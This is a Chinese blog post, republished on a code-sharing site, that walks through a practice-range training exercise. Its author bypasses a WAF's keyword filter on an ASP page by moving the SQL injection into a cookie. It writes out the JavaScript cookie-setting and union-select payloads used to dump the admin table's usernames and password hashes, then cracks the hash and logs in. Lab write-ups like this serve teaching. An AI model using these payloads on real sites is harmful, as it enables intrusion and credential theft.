码迷,mamicode.com
首页 > 其他好文 > 详细

公开课基础演练靶场-尤里的复仇Ⅰ 小芳!-第二章:遇到阻难!绕过WAF过滤!

时间:2020-04-21 18:19:43      阅读:166      评论:0      收藏:0      [点我收藏+]

标签:mamicode   位置   png   span   password   nbsp   lib   参数   打开   

1.打开靶场,随便点击一个页面,带参数,猜想sql注入,单引号判断,弹出警告

 技术图片

 

 

2.看提示,and也不能用了,先用order by暴字段数,order by 10返回正常,order by 11报错,有10个字段数

 技术图片

 

3.union select也不能用,猜想是cookie注入,把参数id=169去掉后访问,报错

 技术图片

 

 

4.地址栏输入 javascript:alert(document.cookie="id="+escape("169")); 弹出对话框

 技术图片

 

 

5.再次访问http://117.167.136.245:10181/shownews.asp? 返回正常

 技术图片

 

 

6.再次验证了是cookie注入,构造语句暴出位置,并猜解表名,说明存在admin这个表

javascript:alert(document.cookie="id="+escape("169+union+select+1,2,3,4,5,6,7,8,9,10+from+admin"));

 技术图片

 

 

7.访问查看

 技术图片

 

 

8.继续,猜解字段和暴值,

javascript:alert(document.cookie="id="+escape("169+union+select+1,username,password,4,5,6,7,8,9,10+from+admin"));

 技术图片

 

 

9.查看

 技术图片

 

 

10.MD5解密得

 技术图片

 

 

11.登录后台

 技术图片

 

 

12.得到flag

 技术图片

 

 


 

公开课基础演练靶场-尤里的复仇Ⅰ 小芳!-第二章:遇到阻难!绕过WAF过滤!

标签:mamicode   位置   png   span   password   nbsp   lib   参数   打开   

原文地址:https://www.cnblogs.com/joker-vip/p/12746326.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!